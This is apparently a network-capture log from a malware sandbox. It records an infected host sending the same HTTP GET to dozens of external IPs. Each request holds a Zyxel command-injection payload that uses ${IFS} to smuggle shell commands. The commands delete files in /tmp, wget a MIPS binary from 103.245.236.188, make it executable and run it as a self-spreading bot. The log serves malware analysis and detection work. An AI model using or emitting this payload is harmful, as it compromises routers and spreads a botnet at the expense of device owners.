                                                Jan 12, 2024 18:16:25.497468948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4883192.168.2.2336042135.156.106.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.497498035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4884192.168.2.234573620.96.44.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.497529984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4885192.168.2.2347676186.33.31.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.497554064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4886192.168.2.2350016216.231.79.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.497612000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4887192.168.2.2341976173.199.52.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.497651100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4888192.168.2.2360646133.253.32.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.497677088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4889192.168.2.2348810185.159.173.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.497716904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4890192.168.2.2335496162.229.146.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.497755051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4891192.168.2.233444837.8.218.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.497778893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4892192.168.2.2352178148.8.199.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.497834921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4893192.168.2.2335676117.129.27.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.497868061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4894192.168.2.234688085.172.126.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.497920036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4895192.168.2.2349742160.69.13.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.497946024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4896192.168.2.2344806152.191.137.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.497994900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4897192.168.2.2355962172.42.60.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.498034954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4898192.168.2.233368887.140.143.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.498081923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4899192.168.2.235097072.17.130.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.498122931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4900192.168.2.234757632.41.148.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.498152018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4901192.168.2.234751069.174.5.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.498218060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4902192.168.2.2347638107.238.143.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.498229027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4903192.168.2.2351016147.129.158.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.498266935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4904192.168.2.2341328162.229.83.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.498306036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4905192.168.2.2345398197.241.87.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.498347044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4906192.168.2.2335844161.248.108.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.498393059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4907192.168.2.2343920119.198.241.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.498416901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4908192.168.2.2351286190.48.115.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.498478889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4909192.168.2.235556651.157.158.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.498509884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4910192.168.2.2341050194.86.250.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.498543978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4911192.168.2.2335964199.222.157.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.498620033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4912192.168.2.2352084101.141.152.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.498651981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4913192.168.2.2356318179.142.166.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.498708010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4914192.168.2.234005263.143.165.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.498756886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4915192.168.2.2356980160.183.106.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.498781919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4916192.168.2.2343968208.31.120.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.498859882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4917192.168.2.2356476145.245.51.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.498899937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4918192.168.2.234606075.128.93.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.498935938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4919192.168.2.233412685.11.212.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.498982906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4920192.168.2.2347378209.66.191.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.499007940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4921192.168.2.2344472172.99.217.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.499058008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4922192.168.2.234644865.91.23.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.499104023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4923192.168.2.2339264219.156.27.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.499139071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4924192.168.2.233544058.232.227.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.499175072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4925192.168.2.234579049.117.60.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.499221087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4926192.168.2.2353090210.105.5.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.499254942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4927192.168.2.2347944110.89.120.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.499286890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4928192.168.2.2333184136.21.159.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.499325037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4929192.168.2.2341378128.247.37.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.499362946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4930192.168.2.2338160173.93.28.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.499417067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4931192.168.2.2360124135.133.14.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.499468088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4932192.168.2.234057646.167.242.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.499491930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4933192.168.2.2339140115.134.22.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.499535084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4934192.168.2.2353868104.94.145.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.499563932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4935192.168.2.2350774169.92.0.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.499593019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4936192.168.2.2338268187.134.168.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.499631882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4937192.168.2.233749274.79.207.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.499679089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4938192.168.2.2358748102.226.184.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.499717951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4939192.168.2.2347988213.210.195.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.499758959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4940192.168.2.2340232154.153.190.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.499794006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4941192.168.2.234773632.206.122.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.499829054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4942192.168.2.2342742175.7.135.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.499860048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4943192.168.2.234658078.198.186.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.499883890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4944192.168.2.2351286189.125.155.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:25.499917984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4945192.168.2.2340566143.4.223.175443
                                                TimestampBytes transferredDirectionData
